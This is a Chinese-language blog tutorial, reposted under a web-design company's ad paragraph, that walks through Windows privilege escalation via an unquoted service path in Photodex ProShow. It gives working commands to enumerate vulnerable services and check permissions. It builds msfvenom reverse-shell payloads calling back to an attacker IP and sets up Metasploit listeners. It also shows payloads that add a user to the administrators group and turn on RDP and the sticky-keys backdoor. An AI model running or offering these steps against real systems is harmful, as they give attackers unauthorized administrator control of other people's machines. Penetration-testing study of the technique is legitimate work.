這篇文章給大家分享的是有關(guān)Windows平臺(tái)下如何實(shí)現(xiàn)提權(quán)的內(nèi)容。小編覺得挺實(shí)用的，因此分享給大家做個(gè)參考，一起跟隨小編過來看看吧。

成都創(chuàng)新互聯(lián)公司2013年至今，是專業(yè)互聯(lián)網(wǎng)技術(shù)服務(wù)公司，擁有項(xiàng)目成都做網(wǎng)站、網(wǎng)站設(shè)計(jì)、外貿(mào)營銷網(wǎng)站建設(shè)網(wǎng)站策劃，項(xiàng)目實(shí)施與項(xiàng)目整合能力。我們以讓每一個(gè)夢(mèng)想脫穎而出為使命，1280元鳳岡做網(wǎng)站,已為上家服務(wù),為鳳岡各地企業(yè)和個(gè)人服務(wù),聯(lián)系電話:028-86922220

無引號(hào)服務(wù)路徑漏洞

這個(gè)漏洞跟可執(zhí)行文件的路徑有關(guān)，如果文件名中存在空格，或者文件路徑?jīng)]有包裹在雙引號(hào)之中，那攻擊者就可以用惡意exe文件替換掉原本合法的exe文件，并實(shí)現(xiàn)提權(quán)。

環(huán)境搭建

目標(biāo)主機(jī)：Windows 7

攻擊主機(jī)：Kali Linux

首先，我們需要在目標(biāo)Windows系統(tǒng)中下載并安裝一個(gè)名叫photodex proshow的包含漏洞的應(yīng)用程序，下載鏡像可以在Exploit DB上找到。

生成目標(biāo)主機(jī)

為了拿到meterpreter會(huì)話，我們至少要成功入侵目標(biāo)Windows設(shè)備一次，你可以從下圖中看到，我們已經(jīng)拿到了目標(biāo)主機(jī)的meterpreter會(huì)話了?，F(xiàn)在，打開命令Shell：

shell

你可以看到，我們拿到的shell訪問權(quán)是本地用戶local_user，為了拿到cmd的管理員權(quán)限，我們就需要提權(quán)。首先，我們可以枚舉出目標(biāo)主機(jī)上正在運(yùn)行的所有服務(wù)，并找出那些沒有被雙引號(hào)包裹的服務(wù)路徑，這一步可以用下列命令實(shí)現(xiàn)：

wmic service get name,displayname,pathname,startmode |findstr /i "auto"|findstr /i /v "c:\windows\\" |findstr /i /v """

這里，我們枚舉出了下列路徑：

C:\ProgramFiles\Photodex\ProShow Producer\Scsiaccess.exe

這個(gè)路徑?jīng)]有被雙引號(hào)包裹，而且文件名中也存在空格。

現(xiàn)在，我們需要使用下列命令識(shí)別文件目錄權(quán)限：

icacls Scsiaccess.exe

你可以看到，它給任何人都提供了寫入權(quán)限，這也就意味著任何用戶都可以重寫該文件：

通過進(jìn)程遷移實(shí)現(xiàn)提權(quán)

現(xiàn)在，我們只需要把惡意exe放在同一文件夾內(nèi)，它就自動(dòng)擁有管理員權(quán)限了，當(dāng)服務(wù)重啟之后，Windows將啟動(dòng)這個(gè)惡意exe。

在Kali Linux中打開終端，然后通過下列命令使用msfvenom生成惡意exe Payload：

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.107 lport=1234prependmigrate=true prepenmigrateprocess=explorer.exe -f exe >/root/Desktop/scsiaccess.exe

上面的命令將在桌面生成一個(gè)惡意exe文件，然后將該文件發(fā)送給目標(biāo)主機(jī)。Payload會(huì)嘗試遷移惡意進(jìn)程，如果用戶通過進(jìn)程ID終止了當(dāng)前進(jìn)程的運(yùn)行，攻擊者也不會(huì)丟失會(huì)話和Payload的控制權(quán)。

現(xiàn)在，用惡意exe替換掉合法的可執(zhí)行文件，這里我把合法Scsiaccess.exe重命名為了Scsiaccess.exe.orginal，并將惡意Scsiaccess.exe上傳到了同一文件夾內(nèi)，然后重啟目標(biāo)主機(jī)：

movescsiaccess.exe scsiaccess.exe.orginalupload/root/Desktop/ scsiaccess.exe

reboot：

與此同時(shí)，我在新的終端里開啟了多個(gè)handler監(jiān)聽器來捕捉meterpreter會(huì)話：

use exploit/multi/handlermsf exploit(multi/handler) set payload windows /meterpreter/reverse_tcpmsf exploit(multi/handler) set lhost 192.168.1.107msf exploit(multi/handler) set lport 1234msf exploit(multi/handler) exploit

一段時(shí)間之后，我們就能夠拿到擁有管理員權(quán)限的shell了：

通過添加管理員組用戶來實(shí)現(xiàn)提權(quán)

使用local_user權(quán)限生成了shell之后，我們就可以在沒有管理員權(quán)限的情況下枚舉完整的用戶名列表了。這里我們發(fā)現(xiàn)，用戶raaz不是管理員組的成員：

net usernet user raaz

同樣的，我們生成了一個(gè)exe文件，并用它來將用戶raaz添加到了管理員組中，我們生成的惡意exe文件名還是叫Scsiaccess.exe：

msfvenom -p windows/exec CMD='net localgroup administrators raaz /add' -f exe >/root/Desktop/scsiaccess.exe

重復(fù)上述步驟，用惡意exe文件替換掉同一目錄下的合法exe，然后重啟目標(biāo)主機(jī)：

仔細(xì)看下面的截圖，你就會(huì)發(fā)現(xiàn)用戶raaz已經(jīng)成為了管理員組成員了：

通過RDP&Sticky_key實(shí)現(xiàn)提權(quán)

使用msfvenom生成一個(gè)相同文件名（Scsiaccess.exe）的exe文件，然后將其發(fā)送至目標(biāo)主機(jī)，同時(shí)利用自動(dòng)運(yùn)行腳本開啟多個(gè)監(jiān)聽器，這樣將會(huì)啟用RDP服務(wù)：

use exploit/multi/handlermsf exploit(multi/handler) set payload windows /meterpreter/reverse_tcpmsf exploit(multi/handler) set lhost 192.168.1.107msf exploit(multi/handler) set lport 1234msf exploit(multi/handler) set AutoRunScript post/windows/manage/enable_rdpmsf exploit(multi/handler) exploit

類似的，當(dāng)目標(biāo)服務(wù)重啟之后，我們可以設(shè)置自動(dòng)運(yùn)行腳本來啟用sticky_keys：

msf exploit(multi/handler) set AutoRunScript post/windows/manage/sticky_keysmsf exploit(multi/handler) run

你可以從下圖中看到，命令開啟了另一個(gè)meterpreter會(huì)話（session 3），這個(gè)會(huì)話擁有管理員權(quán)限，現(xiàn)在我們就可以通過RDP與目標(biāo)主機(jī)建立連接了：

rdp 192.168.1.101

接下來，連續(xù)按下5次shift鍵，你將會(huì)拿到擁有管理員權(quán)限的命令行窗口：

感謝各位的閱讀！關(guān)于“Windows平臺(tái)下如何實(shí)現(xiàn)提權(quán)”這篇文章就分享到這里了，希望以上內(nèi)容可以對(duì)大家有一定的幫助，讓大家可以學(xué)到更多知識(shí)，如果覺得文章不錯(cuò)，可以把它分享出去讓更多的人看到吧！